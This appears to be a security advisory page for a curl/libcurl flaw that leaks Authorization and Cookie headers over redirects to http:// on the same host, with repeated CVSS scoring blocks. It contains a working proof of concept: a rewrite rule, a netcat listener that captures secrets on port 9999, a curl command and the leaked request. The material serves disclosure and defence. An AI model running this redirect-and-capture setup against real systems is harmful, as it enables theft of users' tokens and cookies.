6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
38.2%
curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]
… the attacker could also use .htpasswd
file to do so.
2. Set up netcat to listen for the incoming secrets:
while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -l -p 9999; done
3. curl-L -H "Authorization: secrettoken" -H "Cookie: secretcookie" https://hostname.tld/redirectpoc
The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:
GET / HTTP/1.1
Host: hostname.tld:9999
User-Agent: curl/7.83.0-DEV
Accept: */*
Authorization: secrettoken
Cookie: secretcookie
The attack could also use HTTPS and a valid certificate, In this case the leaked headers are of course only be visible to the listening http server.
This vulnerability is quite similar to CVE-2022-27774
and the fix is similar too: If the protocol or port number differs from the original request strip the Authorization and Cookie headers.
This bug appears to be at:
Leak of Authorization and/or Cookie headers.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
38.2%